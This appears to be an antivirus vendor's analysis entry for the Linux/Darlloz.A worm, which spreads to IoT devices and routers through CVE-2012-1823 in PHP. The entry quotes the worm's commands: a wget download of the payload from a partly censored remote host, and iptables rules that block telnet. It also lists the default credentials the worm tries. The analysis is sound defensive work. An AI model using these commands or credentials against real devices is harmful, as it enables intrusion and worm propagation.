virus logo Virus

Linux/Darlloz.A

description-logoAnalysis

Linux.Darlloz is a worm targetting Linux-based devices. As flavours of this malware exist for embedded devices, it is possible (though not confirmed) that this malware might be targetting Linux-based embedded devices such as Internet of Things devices.

The worm infects hosts using a PHP vulnerability (CVE-2012-1823). This vulnerability has been patched quite a long time ago, but some old not up-to-date devices might still be vulnerable. The vulnerability allows attackers to run arbitrary PHP code on the affected computer.
The attackers have vulnerable hosts download a copy of itself from a remote server: 

wget -O /tmp/x86 http://www.[CENSORED]n.de/solar/x86

or from 
http://www.gp[CENSORED].co

The sample is then made executable (chmod +x).
Although many samples only download x86 versions of the malware, some samples also download files for different architectures: arm, ppc, mips, mipsel and x86.
The malware loads the ip_tables kernel modules: 
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko
and re-creates a rule to make sure telnet connections to the infected device are prevented: 
iptables -D INPUT -p tcp --dport 23 -j DROP
iptables -A INPUT -p tcp --dport 23 -j DROP
The worm also tries to terminate the telnetd process. Finally, the worm will scan other devices on the network and try to connect to them, using the same PHP exploit. If necessary, it provides one of the following default credentials: 
admin/admin
root/[BLANK]
root/root
admin/1234
admin/12345
root/admin
root/dreambox
admin/smcadmin
admin/[BLANK]

Based on the default user id / password credentials, we guess that the malware particularly targets SMC ADSL routers Barricade7204BRB and WHSG44G. but also Dreamboxes (TV/satellite reception boxes).

recommended-action-logoRecommended Action

    FortiGate Systems
  • Check the main screen using the web interface for your FortiGate unit to ensure that the latest AV/NIDS database has been downloaded and installed on your system - if required, enable the "Allow Push Update" option.
    FortiClient Systems
  • Quarantine/delete files that are detected and replace infected files with clean backup copies.

Telemetry logoTelemetry

ID 5902488
Released Nov 30, 2013
Description
Updated		 Jan 21, 2014
Aliases Net-Worm.Linux.Darlloz.a (KAV), Linux/Worm-Darlloz (McAffee)